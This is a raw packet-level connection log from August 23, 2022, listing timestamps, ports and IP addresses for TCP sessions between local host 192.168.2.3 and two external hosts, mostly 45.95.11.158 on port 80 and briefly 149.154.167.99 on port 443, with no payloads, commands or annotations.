Aug 23, 2022 18:24:01.710696936 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710798979 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710824966 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710844994 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710849047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710876942 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710887909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.710925102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.710973024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.715660095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.715692997 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.715749025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.715776920 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.715909958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.715935946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.715961933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.715972900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.715987921 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.715987921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716000080 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716012955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716038942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716041088 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716057062 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716063976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716089964 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716093063 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716099977 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716114998 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716135025 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716136932 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716159105 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716166019 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716180086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716188908 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716208935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716214895 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716233969 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716238976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716264009 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716269970 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716275930 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716291904 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716312885 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716319084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716336966 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716346025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716362953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716371059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716396093 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716398954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716408014 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716424942 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716447115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716448069 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716471910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716471910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716489077 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716495991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716521978 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716537952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716546059 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716572046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716600895 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716662884 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716711998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716720104 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716743946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716772079 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716783047 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716787100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716806889 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.716866016 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716872931 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.716970921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717000008 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717024088 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717025042 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717036963 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717068911 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717072010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717092991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717118025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717134953 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717139006 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717161894 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717175007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717206955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717217922 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717262030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717262983 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717288017 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717310905 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717314959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717336893 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717349052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717361927 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717371941 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717376947 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717386007 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.717402935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.717458010 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.741588116 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.741614103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.741636992 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.741657972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.741677046 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.741734982 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.741741896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.741746902 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.741770029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.741796017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.741835117 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742605925 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742631912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742659092 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742657900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742677927 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742686987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742698908 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742721081 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742728949 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742763996 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742778063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742799044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742819071 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742824078 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742841959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742846012 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742849112 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742882967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742885113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742908001 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742924929 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742940903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.742945910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.742984056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744380951 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744467020 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744498014 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744555950 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744657993 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744679928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744700909 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744726896 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744729996 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744760036 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744764090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744769096 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744788885 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744801998 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744807005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744817972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744829893 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744848013 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744863033 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744874954 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744910955 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744916916 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744930029 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744951963 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.744975090 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.744991064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.749867916 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.749962091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.749962091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.749985933 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.750013113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.750013113 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.750025988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.750117064 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.750678062 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.750752926 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.750823975 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.750861883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.750881910 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.750911951 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.750936031 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.751053095 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.751077890 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.751106024 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.751131058 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.751147032 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.751169920 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.751235008 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752137899 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752165079 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752196074 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752214909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752330065 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752362967 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752377987 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752423048 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752446890 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752459049 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752480030 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752496004 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752507925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752525091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.752537012 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.752567053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753081083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753108025 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753139973 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753153086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753156900 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753190994 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753205061 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753226995 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753233910 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753253937 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753269911 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753298044 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753802061 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753833055 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753863096 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753864050 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753875017 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753921986 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:01.753935099 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:01.753982067 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.283843040 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.283874035 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.284354925 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.284427881 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.299408913 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.343384981 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.346888065 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.346932888 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.346992970 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.347031116 CEST	443	49836	149.154.167.99	192.168.2.3
Aug 23, 2022 18:24:02.347054005 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.347076893 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.347084999 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.347093105 CEST	49836	443	192.168.2.3	149.154.167.99
Aug 23, 2022 18:24:02.451087952 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.485714912 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576643944 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576677084 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576699972 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576721907 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576724052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.576745987 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576750040 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.576767921 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576786041 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576802015 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.576807022 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576831102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576841116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.576853991 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.576862097 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.576893091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.576913118 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611030102 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611069918 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611092091 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611120939 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611136913 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611148119 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611159086 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611169100 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611181974 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611187935 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611202955 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611203909 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611222029 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611222982 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611238003 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611246109 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611259937 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611268044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611284018 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611303091 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611324072 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611361980 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611361980 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611388922 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611409903 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611417055 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611428976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611439943 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611452103 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611462116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611473083 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611474991 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611493111 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611499071 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611515999 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611520052 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611530066 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611538887 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.611556053 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.611577988 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645775080 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645812988 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645840883 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645843983 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645868063 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645872116 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645895958 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645895958 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645921946 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645931959 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645951986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645958900 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645978928 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.645979881 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.645992041 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646018028 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646047115 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646074057 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646090984 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646100044 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646111965 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646126986 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646140099 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646166086 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646202087 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646245956 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646249056 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646272898 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646292925 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646300077 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646317005 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646341085 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646435976 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646462917 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646477938 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646512032 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646524906 CEST	80	49827	45.95.11.158	192.168.2.3
Aug 23, 2022 18:24:02.646572113 CEST	49827	80	192.168.2.3	45.95.11.158
Aug 23, 2022 18:24:02.646584988 CEST	80	49827	45.95.11.158	192.168.2.3
